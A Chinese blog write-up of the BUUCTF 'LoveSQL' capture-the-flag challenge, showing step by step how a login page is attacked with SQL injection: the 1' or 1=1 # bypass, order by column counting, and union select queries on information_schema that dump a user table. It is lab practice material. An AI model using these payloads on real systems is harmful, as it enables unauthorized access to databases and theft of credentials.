buuctf 极客大挑战 lovesql

最新推荐文章于 2022-03-03 20:59:32 发布
最新推荐文章于 2022-03-03 20:59:32 发布
阅读量176 收藏
点赞数 1
分类专栏: writeup 网络安全 文章标签: mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fightte/article/details/116954352
版权

在这里插入图片描述
界面长这样:

尝试输入1’判断是否有注入漏洞:
在这里插入图片描述
这样的报错,可以看出是有的。

输入万能密码进行尝试 1’or 1 =1 #进行尝试:
在这里插入图片描述
登录成功,输出了奇怪的字符串,但与密码学无关。

是get型的输入,将网址栏的password进行改变,改为:13‘
在这里插入图片描述
发现出现了和13’有关的报错。

判断是字符型,而不是整型。

尝试在password处使用sql语句进行堆叠注入:

好复杂,暂时放下,

。。。。。。

继续:

尝试使用order by 语句查询字段数:
在这里插入图片描述
字段数为3时,应该是存在的,但转到4就不存在了。

?username=admin' order by 3%23&password=1

联合查询:

/check.php?username=1' union select 1,2,3%23&password=1

在这里插入图片描述
查询数据库名称;

 /check.php?username=1' union select 1,database(),version()%23&password=1

在这里插入图片描述
名称为greek.用如下语段,查询数据表:

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

在这里插入图片描述
得到了两个表:

尝试l0ve1ysq1这个表:

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

在这里插入图片描述
爆出三个子段,再爆出数据:

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

在这里插入图片描述
出现flag

F1gh4
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
2020年掘安杯网络安全技能挑战赛理论练习--问卷填...
32bin的博客
06-13 1万+
2020年掘安杯网络安全技能挑战赛理论练习--问卷填... 1 of 8 https://ks.wjx.top/wjx/join/complete.aspx?q=548... 2020年掘安杯网络安全技能挑战赛理论练习 成绩单 255/360 43/62 您的得分 答对题数 答题解析 全部题目 错题集 1. 信息安全的基本属性是___。 [分值:5] 您的回答:D. A, B, C 都是 (得分:5) 2. 假设使用一种加密算法, 它的加密方法很简单: 将每一个字母加5, 即a
SQL注入原理-万能密码注入
热门推荐
Unitue_逆流
01-23 1万+
一、学习目的 1、理解【万能密码】原理 2、学习【万能密码】的使用 二、实验环境: 本机:192.168.1.2 目标机:192.168.1.3 三、举例说明 1、输入一个存在漏洞的网站,例如:http://192.168.1.3:8009 **2、输入用户名:admin 万能密码:2’or’1 如图:** 3、成功进入后台管理
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?...资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
CTFWeb-BUUCTF竞赛真题WriteUp(1)
道阻且长,行则将至。
08-20 7683
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真题环境: 此处记录下部分 Web 题目练习过程。 N0.1 强网杯-高明的黑客 1、创建并访问靶机: 2、根据题目提示,访问并下载 www.tar.gz: 打开压缩包,发现有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发现代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
BUUCTF Web [极客挑战 2019]EasySQL
weixin_45674567的博客
01-30 598
直接sql注入,密码用sql手工注入万能密码得到flaghttps://mp.weixin.qq.com/s?src=11&timestamp=1580373488&ver=2127&signature=hap8iqIeunD0CKRTDTxrcAZusO5XeRbjouBvHoEI2aHHkh3qt61zapncy3SLvDS*0zOPFylzy0D9LbukmQH8G3...
[极客挑战 2020]FighterFightsInvincibly
weixin_45805993的博客
09-13 605
正好同学搭了这题的复现环境就做了一下,感觉还是挺好的题,buu的环境不知道是不是配置的有问题只有一个人解,当时就没去看 源码就一行$_REQUEST['fighter']($_REQUEST['fights'],$_REQUEST['invincibly']); 用create_function 构造fighter=create_function&fights=&invincibly=;}phpinfo();/* 可以读到phpinfo,直接连shell的话不行,应该是设置了权限,而且读ph
第11届极客挑战writeup
weixin_45883223的博客
11-25 2414
第11届极客挑战writeupWeb朋友的学妹EZwww刘壮的黑页WelcomeEZgit我是大黑客ezbypassReNo RE no gain我真不会写驱动!WhatsApkHelloAndroidre00mazeMisc一“页”障目壮言壮语秘技·反复横跳来拼图Pwn数学咋样?runcodeliuzhuang-secretbaby_canaryCrypto二战情报员刘壮铠甲与萨满成都养猪二厂规规矩矩的工作babyRSA韡髻猊岈 Web 朋友的学妹 F12,注释,base64解码 EZwww url最后
BUUCTF】[极客挑战 2019]LoveSQL 详细题解总结笔记 Writeup
algae
08-13 3051
BUUCTF】[极客挑战 2019]LoveSQL一.题目内容1.考点二. 解题过程1.万能密码2.爆字段3. 一.题目内容 1.考点 二. 解题过程 1.万能密码 账号 admin' or 1=1 # 密码 1 admin 47cb230740bc6725fd194aec8e479fc4 Tips:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23 2.爆字段 check.php?username=admin ' order by 1 %23&passwo
CTF Geek Challenge——第十一届极客挑战Re Write Up
无限迭代中......
11-18 666
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5382
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
BUUCTF-web-[极客挑战 2019]Secret File
weixin_44866139的博客
05-16 3799
查看源码之后发现achieve_room.php 点击secret,发现end.php 提示回去再仔细看看,查看achieve.php的源代码 发现action.php,访问,然而依旧回到了end.php 说明这个跳转的时间特别快,我们需要抓包,有一个抓包神器BrupSuite,使用它发现action有一个隐藏的回应 <html> <title>secret</title> <meta charset="UTF-8"> <?php
[极客挑战 2019]EasySQL(万能密码)
weixin_45253573的博客
11-09 338
打开环境,是一个登录页面 输入admin/admin 错误测用户名和密码 尝试输入全显语句 usernam输入1’or 1=1# password随便写 成功
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

F1gh4

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值